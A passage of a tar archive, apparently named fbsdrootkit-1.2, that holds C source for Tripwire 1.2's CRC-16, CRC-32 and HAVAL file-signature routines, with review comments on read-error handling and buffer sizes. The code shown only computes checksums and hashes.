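    if (bufsize <= 0)
        return;

    for (i = 0; i < bufsize; i++) {
        tmp = crc16 ^ buffer[i];
        crc16 = (crc16 >> 8) ^ crc16tab[tmp & 0xff];
    }
}

/*
 * sig_crc_get -- compute the CRC-16 signature of the file open on fd_in.
 *
 * fd_in         descriptor to read; it is rewound to offset 0 first.
 * ps_signature  receives the NUL-terminated signature text: four hex digits
 *               when printhex is set, otherwise the string produced by
 *               pltob64().
 * siglen        not consulted here; the writes to ps_signature are
 *               unbounded, so the caller must pass a buffer large enough
 *               for the text (presumably SIG_MAX_LEN bytes -- confirm
 *               against the caller).
 *
 * Returns 0 on success and -1 if read() fails, the same convention
 * sig_crc32_get() uses.  Exits the process if the descriptor cannot be
 * rewound.
 *
 * The result is accumulated in the file-scope crc16 variable, so the routine
 * is not reentrant.  CRC-16 only detects accidental change; it is not
 * collision resistant and should not be the only signature relied on for
 * tamper detection.
 */
int
sig_crc_get(fd_in, ps_signature, siglen)
    int fd_in;
    char *ps_signature;
    int siglen;
{
    unsigned char buffer[BUFSIZE];
    int readin;
    int scratch[100];

    if (lseek(fd_in, 0, SEEK_SET) < 0) {
        perror("sig_crc_get: lseek()");
        exit(1);
    }

    crc16 = 0;

    /*
     * Consume until end of file.  Stopping at the first short read, as the
     * earlier loop did, silently checksums only a prefix whenever read()
     * returns fewer bytes than requested before EOF.
     */
    while ((readin = read(fd_in, (char *)buffer, sizeof buffer)) > 0) {
        UpdateCRC16(buffer, readin);
    }

    /* A failed read must not be folded into the checksum as a byte count. */
    if (readin < 0)
        return -1;

    if (printhex) {
        /* %lx takes an unsigned long; crc16 is an unsigned int. */
        sprintf(ps_signature, "%04lx", (unsigned long)(crc16 & 0xFFFF));
    } else {
        uint32 l = (uint32)(crc16 & 0xFFFF);

        sprintf(ps_signature, "%s", pltob64(&l, (char *)scratch, 1));
    }
    return 0;
}
fbsdrootkit-1.2/tripwire-1.2/sigs/crc/crc.h100600 764 764 113 5434607520 15712 0ustar dfdf/* $Id: crc.h,v 1.2 1993/08/19 05:27:44 genek Exp $ */ int sig_crc_get(); fbsdrootkit-1.2/tripwire-1.2/sigs/crc32/ 40700 764 764 0 5630552015 15061 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/sigs/crc32/Makefile100600 764 764 365 5502764526 16616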
0ustar dfdf# $Id: Makefile,v 1.4 1993/12/13 04:02:30 genek Exp $ # # Makefile for crc32 wrapper # # Gene Kim # Purdue University # October 18, 1992 # all: crc32.o .c.o: $(CC) $(CFLAGS) -c $< clean: -rm -f *.o .pure crc32.o: ../../include/byteorder.h fbsdrootkit-1.2/tripwire-1.2/sigs/crc32/crc32.c100600 764 764 15506 5614757125 16302 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: crc32.c,v 1.10 1994/07/25 15:46:29 gkim Exp $"; #endif /*- * Copyright (c) 1991, 1993 * The Regents of the University of California. All rights reserved. * * This code is derived from software contributed to Berkeley by * James W. Williams of NASA Goddard Space Flight Center. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. 
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ /* * crc32.c * * signature function hook for CRC32. * * Gene Kim * Purdue University * August 31, 1993 */ #include "../../include/config.h" #include #include #ifdef STDLIBH #include #include #endif #include "../../include/sigs.h" #include "crc32.h" #define BUFSIZE 4096 static uint32 crctab[] = { 0x0, 0x04c11db7, 0x09823b6e, 0x0d4326d9, 0x130476dc, 0x17c56b6b, 0x1a864db2, 0x1e475005, 0x2608edb8, 0x22c9f00f, 0x2f8ad6d6, 0x2b4bcb61, 0x350c9b64, 0x31cd86d3, 0x3c8ea00a, 0x384fbdbd, 0x4c11db70, 0x48d0c6c7, 0x4593e01e, 0x4152fda9, 0x5f15adac, 0x5bd4b01b, 0x569796c2, 0x52568b75, 0x6a1936c8, 0x6ed82b7f, 0x639b0da6, 0x675a1011, 0x791d4014, 0x7ddc5da3, 0x709f7b7a, 0x745e66cd, 0x9823b6e0, 0x9ce2ab57, 0x91a18d8e, 0x95609039, 0x8b27c03c, 0x8fe6dd8b, 0x82a5fb52, 0x8664e6e5, 0xbe2b5b58, 0xbaea46ef, 0xb7a96036, 0xb3687d81, 0xad2f2d84, 0xa9ee3033, 0xa4ad16ea, 0xa06c0b5d, 0xd4326d90, 0xd0f37027, 0xddb056fe, 0xd9714b49, 0xc7361b4c, 0xc3f706fb, 0xceb42022, 0xca753d95, 0xf23a8028, 0xf6fb9d9f, 0xfbb8bb46, 0xff79a6f1, 0xe13ef6f4, 0xe5ffeb43, 0xe8bccd9a, 0xec7dd02d, 0x34867077, 0x30476dc0, 0x3d044b19, 0x39c556ae, 0x278206ab, 0x23431b1c, 0x2e003dc5, 0x2ac12072, 0x128e9dcf, 0x164f8078, 0x1b0ca6a1, 0x1fcdbb16, 0x018aeb13, 0x054bf6a4, 0x0808d07d, 0x0cc9cdca, 0x7897ab07, 0x7c56b6b0, 0x71159069, 0x75d48dde, 0x6b93dddb, 0x6f52c06c, 0x6211e6b5, 0x66d0fb02, 0x5e9f46bf, 0x5a5e5b08, 0x571d7dd1, 0x53dc6066, 0x4d9b3063, 0x495a2dd4, 0x44190b0d, 0x40d816ba, 0xaca5c697, 0xa864db20, 
0xa527fdf9, 0xa1e6e04e, 0xbfa1b04b, 0xbb60adfc, 0xb6238b25, 0xb2e29692, 0x8aad2b2f, 0x8e6c3698, 0x832f1041, 0x87ee0df6, 0x99a95df3, 0x9d684044, 0x902b669d, 0x94ea7b2a, 0xe0b41de7, 0xe4750050, 0xe9362689, 0xedf73b3e, 0xf3b06b3b, 0xf771768c, 0xfa325055, 0xfef34de2, 0xc6bcf05f, 0xc27dede8, 0xcf3ecb31, 0xcbffd686, 0xd5b88683, 0xd1799b34, 0xdc3abded, 0xd8fba05a, 0x690ce0ee, 0x6dcdfd59, 0x608edb80, 0x644fc637, 0x7a089632, 0x7ec98b85, 0x738aad5c, 0x774bb0eb, 0x4f040d56, 0x4bc510e1, 0x46863638, 0x42472b8f, 0x5c007b8a, 0x58c1663d, 0x558240e4, 0x51435d53, 0x251d3b9e, 0x21dc2629, 0x2c9f00f0, 0x285e1d47, 0x36194d42, 0x32d850f5, 0x3f9b762c, 0x3b5a6b9b, 0x0315d626, 0x07d4cb91, 0x0a97ed48, 0x0e56f0ff, 0x1011a0fa, 0x14d0bd4d, 0x19939b94, 0x1d528623, 0xf12f560e, 0xf5ee4bb9, 0xf8ad6d60, 0xfc6c70d7, 0xe22b20d2, 0xe6ea3d65, 0xeba91bbc, 0xef68060b, 0xd727bbb6, 0xd3e6a601, 0xdea580d8, 0xda649d6f, 0xc423cd6a, 0xc0e2d0dd, 0xcda1f604, 0xc960ebb3, 0xbd3e8d7e, 0xb9ff90c9, 0xb4bcb610, 0xb07daba7, 0xae3afba2, 0xaafbe615, 0xa7b8c0cc, 0xa379dd7b, 0x9b3660c6, 0x9ff77d71, 0x92b45ba8, 0x9675461f, 0x8832161a, 0x8cf30bad, 0x81b02d74, 0x857130c3, 0x5d8a9099, 0x594b8d2e, 0x5408abf7, 0x50c9b640, 0x4e8ee645, 0x4a4ffbf2, 0x470cdd2b, 0x43cdc09c, 0x7b827d21, 0x7f436096, 0x7200464f, 0x76c15bf8, 0x68860bfd, 0x6c47164a, 0x61043093, 0x65c52d24, 0x119b4be9, 0x155a565e, 0x18197087, 0x1cd86d30, 0x029f3d35, 0x065e2082, 0x0b1d065b, 0x0fdc1bec, 0x3793a651, 0x3352bbe6, 0x3e119d3f, 0x3ad08088, 0x2497d08d, 0x2056cd3a, 0x2d15ebe3, 0x29d4f654, 0xc5a92679, 0xc1683bce, 0xcc2b1d17, 0xc8ea00a0, 0xd6ad50a5, 0xd26c4d12, 0xdf2f6bcb, 0xdbee767c, 0xe3a1cbc1, 0xe760d676, 0xea23f0af, 0xeee2ed18, 0xf0a5bd1d, 0xf464a0aa, 0xf9278673, 0xfde69bc4, 0x89b8fd09, 0x8d79e0be, 0x803ac667, 0x84fbdbd0, 0x9abc8bd5, 0x9e7d9662, 0x933eb0bb, 0x97ffad0c, 0xafb010b1, 0xab710d06, 0xa6322bdf, 0xa2f33668, 0xbcb4666d, 0xb8757bda, 0xb5365d03, 0xb1f740b4 }; /* * Compute a POSIX 1003.2 checksum. 
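This routine has been broken out so that
 * other programs can use it. It takes a file descriptor to read from and
 * locations to store the crc and the number of bytes read. It returns 0 on
 * success and 1 on failure. Errno is set on failure.
 */

uint32 crc_total = 0xffffffff; /* The crc over a number of files. */

/*
 * sig_crc32_get -- compute the CRC-32 signature of the file open on fd_in.
 *
 * The contract differs from the inherited description above: there are no
 * output locations for the crc and length.  The signature is written as text
 * into ps_signature, and the failure return is -1.
 *
 * fd_in         descriptor to read; it is rewound to offset 0 first.
 * ps_signature  receives the NUL-terminated signature text: eight hex
 *               digits when printhex is set, otherwise the pltob64() string
 *               padded to a minimum width of six.
 * siglen        not consulted here; the writes to ps_signature are
 *               unbounded, so the caller must supply a large enough buffer
 *               (presumably SIG_MAX_LEN bytes -- confirm against the
 *               caller).
 *
 * Returns 0 on success and -1 if read() fails.  Exits the process if the
 * descriptor cannot be rewound.
 *
 * Every byte, followed by the byte count, is folded into both the per-file
 * crc and the global crc_total.  The per-file value is emitted without a
 * final complement (the complement is present only as commented-out code in
 * the original), so it is not expected to match a cksum-style value.
 *
 * NOTE(review): on a read error the function returns with crc_total still
 * complemented and partly updated; nothing visible here resets it.
 */
int
sig_crc32_get(fd_in, ps_signature, siglen)
    int fd_in;
    char *ps_signature;
    int siglen;
{
    unsigned char *p;
    int nr;
    uint32 crc, len;
    unsigned char buf[BUFSIZE];
    char scratch[100];

    /* rewind the file descriptor */
    if (lseek(fd_in, 0, SEEK_SET) < 0) {
        /* The label previously named sig_crc_get, a different routine. */
        perror("sig_crc32_get: lseek()");
        exit(1);
    }

    /*
     * The table index (var) >> 24 ^ (ch) stays within one byte only when
     * uint32 is exactly 32 bits wide; a wider typedef would index past
     * crctab.
     */
#define COMPUTE(var, ch) (var) = (var) << 8 ^ crctab[(var) >> 24 ^ (ch)]

    crc = len = 0;
    crc_total = ~crc_total;
    while ((nr = read(fd_in, buf, BUFSIZE)) > 0) {
        len += nr;
        for (p = buf; nr > 0; nr--, p++) {
            COMPUTE(crc, *p);
            COMPUTE(crc_total, *p);
        }
    }
    if (nr < 0)
        return (-1);

    /* Include the length of the file. */
    for (; len != 0; len >>= 8) {
        COMPUTE(crc, len & 0xff);
        COMPUTE(crc_total, len & 0xff);
    }

    crc_total = ~crc_total;

    /* output in ascii */
    if (printhex) {
        /*
         * The earlier "#if ( TW_TYPE32 == int )" test could not tell the
         * types apart: in a preprocessor expression both names evaluate to
         * 0, so "%08x" was always chosen even when uint32 is an unsigned
         * long.  Casting to unsigned long and using %lx is correct for
         * either typedef and prints the same digits.
         */
        sprintf(ps_signature, "%08lx", (unsigned long)crc);
    } else {
        uint32 l = crc;

        sprintf(ps_signature, "%6s", pltob64(&l, scratch, 1));
    }
    return (0);
}
fbsdrootkit-1.2/tripwire-1.2/sigs/crc32/crc32.h100600 764 764 117 5434607525 16235 0ustar dfdf/* $Id: crc32.h,v 1.2 1993/08/19 05:27:49 genek Exp $ */ int sig_crc32_get(); fbsdrootkit-1.2/tripwire-1.2/sigs/haval/ 40700 764 764 0 5630552015 15240 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/sigs/haval/Makefile100600 764 764 501 5611466353 16763 0ustar dfdf# $Id: Makefile,v 1.1 1994/07/15 11:03:07 gkim Exp $ # # Makefile for crc32 wrapper # # Gene Kim # Purdue University (now University of Arizona) # July 10, 1994 # all: haval.o havalwrapper.o .c.o: $(CC) $(CFLAGS) -c $< clean: -rm -f *.o .pure haval.o: ../../include/byteorder.h haval.o: haval.h haval.o: havalapp.h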
fbsdrootkit-1.2/tripwire-1.2/sigs/haval/haval.c100600 764 764 65561 5614757127 16650 0ustar dfdf/* * haval.c: specifies the routines in the HAVAL (V.1) hashing library. * * HAVAL is a one-way hashing algorithm with the following * collision-resistant property: * It is computationally infeasible to find two or more * messages that are hashed into the same fingerprint. * * Reference: * Y. Zheng, J. Pieprzyk and J. Seberry: * ``HAVAL --- a one-way hashing algorithm with variable * length of output'', Advances in Cryptology --- AUSCRYPT'92, * Lecture Notes in Computer Science, Springer-Verlag, 1993. * * Descriptions: * - haval_string: hash a string * - haval_file: hash a file * - haval_stdin: filter -- hash input from the stdin device * - haval_hash: hash a string of specified length * (Haval_hash is used in conjunction with * haval_start & haval_end.) * - haval_hash_block: hash a 32-word block * - haval_start: initialization * - haval_end: finalization * * Author: Yuliang Zheng * Department of Computer Science * University of Wollongong * Wollongong, NSW 2522, Australia * Email: yuliang@cs.uow.edu.au * Voice: +61 42 21 4331 (office) * * Date: June 1993 * * Copyright (C) 1993 by C^3SR. All rights reserved. * This program may not be sold or used as inducement to * buy a product without the written permission of C^3SR. */ /* * Some comments on getting Haval into Tripwire: * * - all #elif directives replaced by ugly #if/#else/#endif sequences. * not all compilers support #elif (an ANSI construct). * - byte-order is discovered at compile time. we use the information * in "../../include/byteorder.h" to get this information. */ /* begin Tripwire hook */ #include "../../include/byteorder.h" #include "../../include/config.h" #include #include #include "havalapp.h" #include "haval.h" /* end Tripwire hook */ #define VERSION 1 /* current version number */ /* Do not remove this line. Protyping depends on it! 
*/ #if defined(__STDC__) || defined(__cplusplus) #define P_(s) s #else #define P_(s) () #endif void haval_string P_((char *, unsigned char *)); /* hash a string */ int haval_file P_((char *, unsigned char *)); /* hash a file */ void haval_stdin P_((void)); /* hash input from stdin */ void haval_start P_((haval_state *)); /* initialization */ void haval_hash P_((haval_state *, unsigned char *, unsigned int)); /* updating routine */ void haval_end P_((haval_state *, unsigned char *)); /* finalization */ void haval_hash_block P_((haval_state *)); /* hash a 32-word block */ static void haval_tailor P_((haval_state *)); /* folding the last output */ static unsigned char padding[128] = { /* constants for padding */ 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 }; #define f_1(x6, x5, x4, x3, x2, x1, x0) \ ((x1) & ((x0) ^ (x4)) ^ (x2) & (x5) ^ \ (x3) & (x6) ^ (x0)) #define f_2(x6, x5, x4, x3, x2, x1, x0) \ ((x2) & ((x1) & ~(x3) ^ (x4) & (x5) ^ (x6) ^ (x0)) ^ \ (x4) & ((x1) ^ (x5)) ^ (x3) & (x5) ^ (x0)) #define f_3(x6, x5, x4, x3, x2, x1, x0) \ ((x3) & ((x1) & (x2) ^ (x6) ^ (x0)) ^ \ (x1) & (x4) ^ (x2) & (x5) ^ (x0)) #define f_4(x6, x5, x4, x3, x2, x1, x0) \ ((x4) & ((x5) & ~(x2) ^ (x3) & ~(x6) ^ (x1) ^ (x6) ^ (x0)) ^ \ (x3) & ((x1) & (x2) ^ (x5) ^ (x6)) ^ \ (x2) & (x6) ^ (x0)) #define f_5(x6, x5, x4, x3, x2, x1, x0) \ ((x0) & ((x1) & (x2) & (x3) ^ ~(x5)) ^ \ (x1) & (x4) ^ (x2) & (x5) ^ (x3) & (x6)) /* * Permutations phi_{i,j}, i=3,4,5, j=1,...,i. 
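*
 * PASS = 3:
 *               6 5 4 3 2 1 0
 *               | | | | | | | (replaced by)
 *  phi_{3,1}:   1 0 3 5 6 2 4
 *  phi_{3,2}:   4 2 1 0 5 3 6
 *  phi_{3,3}:   6 1 2 3 4 5 0
 *
 * PASS = 4:
 *               6 5 4 3 2 1 0
 *               | | | | | | | (replaced by)
 *  phi_{4,1}:   2 6 1 4 5 3 0
 *  phi_{4,2}:   3 5 2 0 1 6 4
 *  phi_{4,3}:   1 4 3 6 0 2 5
 *  phi_{4,4}:   6 4 0 5 2 1 3
 *
 * PASS = 5:
 *               6 5 4 3 2 1 0
 *               | | | | | | | (replaced by)
 *  phi_{5,1}:   3 4 1 0 5 2 6
 *  phi_{5,2}:   6 2 1 0 3 4 5
 *  phi_{5,3}:   2 6 0 4 3 1 5
 *  phi_{5,4}:   1 5 3 2 0 4 6
 *  phi_{5,5}:   2 5 0 6 4 3 1
 */

#if   PASS == 3
#  define Fphi_1(x6, x5, x4, x3, x2, x1, x0) \
           f_1(x1, x0, x3, x5, x6, x2, x4)
#else
#  if PASS == 4
#    define Fphi_1(x6, x5, x4, x3, x2, x1, x0) \
           f_1(x2, x6, x1, x4, x5, x3, x0)
#  else
#    define Fphi_1(x6, x5, x4, x3, x2, x1, x0) \
           f_1(x3, x4, x1, x0, x5, x2, x6)
#  endif
#endif

#if   PASS == 3
#  define Fphi_2(x6, x5, x4, x3, x2, x1, x0) \
           f_2(x4, x2, x1, x0, x5, x3, x6)
#else
#  if PASS == 4
#    define Fphi_2(x6, x5, x4, x3, x2, x1, x0) \
           f_2(x3, x5, x2, x0, x1, x6, x4)
#  else
#    define Fphi_2(x6, x5, x4, x3, x2, x1, x0) \
           f_2(x6, x2, x1, x0, x3, x4, x5)
#  endif
#endif

#if   PASS == 3
#  define Fphi_3(x6, x5, x4, x3, x2, x1, x0) \
           f_3(x6, x1, x2, x3, x4, x5, x0)
#else
#  if PASS == 4
#    define Fphi_3(x6, x5, x4, x3, x2, x1, x0) \
           f_3(x1, x4, x3, x6, x0, x2, x5)
#  else
#    define Fphi_3(x6, x5, x4, x3, x2, x1, x0) \
           f_3(x2, x6, x0, x4, x3, x1, x5)
#  endif
#endif

#if   PASS == 4
#  define Fphi_4(x6, x5, x4, x3, x2, x1, x0) \
           f_4(x6, x4, x0, x5, x2, x1, x3)
#else
#  define Fphi_4(x6, x5, x4, x3, x2, x1, x0) \
           f_4(x1, x5, x3, x2, x0, x4, x6)
#endif

#define Fphi_5(x6, x5, x4, x3, x2, x1, x0) \
           f_5(x2, x5, x0, x6, x4, x3, x1)

/* rotation by n bits; written for a word of exactly 32 bits */
#define rotate_right(x, n) (((x) >> (n)) | ((x) << (32-(n))))

#define FF_1(x7, x6, x5, x4, x3, x2, x1, x0, w) { \
      register haval_word temp = Fphi_1(x6, x5, x4, x3, x2, x1, x0); \
      (x7) = rotate_right(temp, 7) + rotate_right((x7), 11) + (w); \
      }

#define FF_2(x7, x6, x5, x4, x3, x2, x1, x0, w, c) { \
      register haval_word temp = Fphi_2(x6, x5, x4, x3, x2, x1, x0); \
      (x7) = rotate_right(temp, 7) + rotate_right((x7), 11) + (w) + (c); \
      }

#define FF_3(x7, x6, x5, x4, x3, x2, x1, x0, w, c) { \
      register haval_word temp = Fphi_3(x6, x5, x4, x3, x2, x1, x0); \
      (x7) = rotate_right(temp, 7) + rotate_right((x7), 11) + (w) + (c); \
      }

#define FF_4(x7, x6, x5, x4, x3, x2, x1, x0, w, c) { \
      register haval_word temp = Fphi_4(x6, x5, x4, x3, x2, x1, x0); \
      (x7) = rotate_right(temp, 7) + rotate_right((x7), 11) + (w) + (c); \
      }

#define FF_5(x7, x6, x5, x4, x3, x2, x1, x0, w, c) { \
      register haval_word temp = Fphi_5(x6, x5, x4, x3, x2, x1, x0); \
      (x7) = rotate_right(temp, 7) + rotate_right((x7), 11) + (w) + (c); \
      }

/*
 * translate every four characters into a word.
 * assume the number of characters is a multiple of four.
 */
#define ch2uint(string, word, slen) { \
  unsigned char *sp = string; \
  haval_word    *wp = word; \
  while (sp < (string) + (slen)) { \
    *wp++ =  (haval_word)*sp | \
            ((haval_word)*(sp+1) <<  8) | \
            ((haval_word)*(sp+2) << 16) | \
            ((haval_word)*(sp+3) << 24); \
    sp += 4; \
  } \
}

/* translate each word into four characters */
#define uint2ch(word, string, wlen) { \
  haval_word    *wp = word; \
  unsigned char *sp = string; \
  while (wp < (word) + (wlen)) { \
    *(sp++) = (unsigned char)( *wp        & 0xFF); \
    *(sp++) = (unsigned char)((*wp >>  8) & 0xFF); \
    *(sp++) = (unsigned char)((*wp >> 16) & 0xFF); \
    *(sp++) = (unsigned char)((*wp >> 24) & 0xFF); \
    wp++; \
  } \
}

/*
 * hash a string
 *
 * string:      NUL-terminated message; the terminator is not hashed
 * fingerprint: receives FPTLEN >> 3 bytes of digest
 */
void haval_string (string, fingerprint)
  char *string;
  unsigned char fingerprint[FPTLEN >> 3];
{
  haval_state   state;
  unsigned int  len = strlen (string);

  haval_start (&state);
  haval_hash (&state, (unsigned char *)string, len);
  haval_end (&state, fingerprint);
}

/*
 * hash a file
 *
 * file_name:   path opened in binary mode
 * fingerprint: receives FPTLEN >> 3 bytes of digest on success
 *
 * Returns 0 on success and 1 on failure.  Failure now also covers a read
 * error part-way through the file: fread() reports an error the same way it
 * reports end of file (a short or zero count), so without the ferror() test
 * the digest of a truncated read was returned as if it were the digest of
 * the whole file.  fingerprint is left untouched on failure.
 */
int haval_file (file_name, fingerprint)
  char *file_name;
  unsigned char fingerprint[FPTLEN >> 3];
{
  FILE          *file;
  haval_state   state;
  size_t        len;
  int           read_failed;
  unsigned char buffer[1024];

  if ((file = fopen (file_name, "rb")) == NULL) {
    return (1);                                  /* fail */
  }

  haval_start (&state);
  while ((len = fread (buffer, 1, sizeof buffer, file)) > 0) {
    /* len is at most sizeof buffer, so the narrowing is safe */
    haval_hash (&state, buffer, (unsigned int)len);
  }
  read_failed = ferror (file);
  fclose (file);
  if (read_failed) {
    return (1);                                  /* fail */
  }
  haval_end (&state, fingerprint);
  return (0);                                    /* success */
}

/*
 * hash input from stdin
 *
 * Reads stdin to end of input and writes the FPTLEN >> 3 digest bytes to
 * stdout as raw bytes (putchar), not as hexadecimal text.
 */
void haval_stdin ()
{
  haval_state   state;
  int           i, len;
  unsigned char buffer[32],
                fingerprint[FPTLEN >> 3];

  haval_start (&state);
  while ((len = fread (buffer, 1, 32, stdin)) != 0) {
    haval_hash (&state, buffer, len);
  }
  haval_end (&state, fingerprint);
  for (i = 0; i < FPTLEN >> 3; i++) {
    putchar(fingerprint[i]);
  }
}

/*
 * initialization
 *
 * Clears the bit count and loads the eight initial fingerprint words.
 */
void haval_start (state)
  haval_state *state;
{
    state->count[0]       = state->count[1] = 0;   /* clear count */
    state->fingerprint[0] = 0x243F6A88;            /* initial fingerprint */
    state->fingerprint[1] = 0x85A308D3;
    state->fingerprint[2] = 0x13198A2E;
    state->fingerprint[3] = 0x03707344;
    state->fingerprint[4] = 0xA4093822;
    state->fingerprint[5] = 0x299F31D0;
    state->fingerprint[6] = 0x082EFA98;
    state->fingerprint[7] = 0xEC4E6C89;
}

/*
 * hash a string of specified length.
 * to be used in conjunction with haval_start and haval_end.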
*/ void haval_hash (state, str, str_len) haval_state *state; unsigned char *str; unsigned int str_len; { unsigned int i, rmd_len, fill_len; /* calculate the number of bytes in the remainder */ rmd_len = (unsigned int)((state->count[0] >> 3) & 0x7F); fill_len = 128 - rmd_len; /* update the number of bits */ if ((state->count[0] += (haval_word)str_len << 3) < ((haval_word)str_len << 3)) { state->count[1]++; } state->count[1] += (haval_word)str_len >> 29; #if BYTEORDER == 0x1234 /* hash as many blocks as possible */ if (rmd_len + str_len >= 128) { memcpy (((unsigned char *)state->block)+rmd_len, str, fill_len); haval_hash_block (state); for (i = fill_len; i + 127 < str_len; i += 128){ memcpy ((unsigned char *)state->block, str+i, 128); haval_hash_block (state); } rmd_len = 0; } else { i = 0; } memcpy (((unsigned char *)state->block)+rmd_len, str+i, str_len-i); #else /* hash as many blocks as possible */ if (rmd_len + str_len >= 128) { memcpy ((char*) &state->remainder[rmd_len], (char*) str, fill_len); ch2uint(state->remainder, state->block, 128); haval_hash_block (state); for (i = fill_len; i + 127 < str_len; i += 128){ memcpy ((char *) state->remainder, (char *) str+i, 128); ch2uint(state->remainder, state->block, 128); haval_hash_block (state); } rmd_len = 0; } else { i = 0; } /* save the remaining input chars */ memcpy ((char *) &state->remainder[rmd_len], (char *) str+i, str_len-i); #endif } /* finalization */ void haval_end (state, final_fpt) haval_state *state; unsigned char final_fpt[FPTLEN >> 3]; { unsigned char tail[10]; unsigned int rmd_len, pad_len; /* * save the version number, the number of passes, the fingerprint * length and the number of bits in the unpadded message. 
*/ tail[0] = (unsigned char)(((FPTLEN & 0x3) << 6) | ((PASS & 0x7) << 3) | (VERSION & 0x7)); tail[1] = (unsigned char)((FPTLEN >> 2) & 0xFF); uint2ch (state->count, &tail[2], 2); /* pad out to 118 mod 128 */ rmd_len = (unsigned int)((state->count[0] >> 3) & 0x7f); pad_len = (rmd_len < 118) ? (118 - rmd_len) : (246 - rmd_len); haval_hash (state, padding, pad_len); /* * append the version number, the number of passes, * the fingerprint length and the number of bits */ haval_hash (state, tail, 10); /* tailor the last output */ haval_tailor(state); /* translate and save the final fingerprint */ uint2ch (state->fingerprint, final_fpt, FPTLEN >> 5); /* clear the state information */ memset ((char *)state, 0, sizeof (*state)); } /* hash a 32-word block */ void haval_hash_block (state) haval_state *state; { register haval_word t0 = state->fingerprint[0], /* make use of */ t1 = state->fingerprint[1], /* internal registers */ t2 = state->fingerprint[2], t3 = state->fingerprint[3], t4 = state->fingerprint[4], t5 = state->fingerprint[5], t6 = state->fingerprint[6], t7 = state->fingerprint[7], *w = state->block; /* Pass 1 */ FF_1(t7, t6, t5, t4, t3, t2, t1, t0, *(w )); FF_1(t6, t5, t4, t3, t2, t1, t0, t7, *(w+ 1)); FF_1(t5, t4, t3, t2, t1, t0, t7, t6, *(w+ 2)); FF_1(t4, t3, t2, t1, t0, t7, t6, t5, *(w+ 3)); FF_1(t3, t2, t1, t0, t7, t6, t5, t4, *(w+ 4)); FF_1(t2, t1, t0, t7, t6, t5, t4, t3, *(w+ 5)); FF_1(t1, t0, t7, t6, t5, t4, t3, t2, *(w+ 6)); FF_1(t0, t7, t6, t5, t4, t3, t2, t1, *(w+ 7)); FF_1(t7, t6, t5, t4, t3, t2, t1, t0, *(w+ 8)); FF_1(t6, t5, t4, t3, t2, t1, t0, t7, *(w+ 9)); FF_1(t5, t4, t3, t2, t1, t0, t7, t6, *(w+10)); FF_1(t4, t3, t2, t1, t0, t7, t6, t5, *(w+11)); FF_1(t3, t2, t1, t0, t7, t6, t5, t4, *(w+12)); FF_1(t2, t1, t0, t7, t6, t5, t4, t3, *(w+13)); FF_1(t1, t0, t7, t6, t5, t4, t3, t2, *(w+14)); FF_1(t0, t7, t6, t5, t4, t3, t2, t1, *(w+15)); FF_1(t7, t6, t5, t4, t3, t2, t1, t0, *(w+16)); FF_1(t6, t5, t4, t3, t2, t1, t0, t7, *(w+17)); FF_1(t5, t4, t3, t2, t1, 
t0, t7, t6, *(w+18)); FF_1(t4, t3, t2, t1, t0, t7, t6, t5, *(w+19)); FF_1(t3, t2, t1, t0, t7, t6, t5, t4, *(w+20)); FF_1(t2, t1, t0, t7, t6, t5, t4, t3, *(w+21)); FF_1(t1, t0, t7, t6, t5, t4, t3, t2, *(w+22)); FF_1(t0, t7, t6, t5, t4, t3, t2, t1, *(w+23)); FF_1(t7, t6, t5, t4, t3, t2, t1, t0, *(w+24)); FF_1(t6, t5, t4, t3, t2, t1, t0, t7, *(w+25)); FF_1(t5, t4, t3, t2, t1, t0, t7, t6, *(w+26)); FF_1(t4, t3, t2, t1, t0, t7, t6, t5, *(w+27)); FF_1(t3, t2, t1, t0, t7, t6, t5, t4, *(w+28)); FF_1(t2, t1, t0, t7, t6, t5, t4, t3, *(w+29)); FF_1(t1, t0, t7, t6, t5, t4, t3, t2, *(w+30)); FF_1(t0, t7, t6, t5, t4, t3, t2, t1, *(w+31)); /* Pass 2 */ FF_2(t7, t6, t5, t4, t3, t2, t1, t0, *(w+ 5), 0x452821E6); FF_2(t6, t5, t4, t3, t2, t1, t0, t7, *(w+14), 0x38D01377); FF_2(t5, t4, t3, t2, t1, t0, t7, t6, *(w+26), 0xBE5466CF); FF_2(t4, t3, t2, t1, t0, t7, t6, t5, *(w+18), 0x34E90C6C); FF_2(t3, t2, 